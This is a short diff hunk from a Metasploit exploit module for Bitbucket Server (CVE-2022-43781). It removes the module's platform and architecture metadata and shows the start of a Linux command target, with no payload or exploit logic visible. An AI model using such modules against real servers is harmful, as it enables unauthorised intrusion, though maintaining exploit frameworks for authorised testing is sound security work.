@@ -40,9 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-security-advisory-2022-11-16-1180141667.html'],
           [ 'CVE', '2022-43781']
         ],
-        'Platform' => [ 'win', 'unix', 'linux' ],
         'Privileged' => true,
-        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
         'Targets' => [
           [
             'Linux Command',
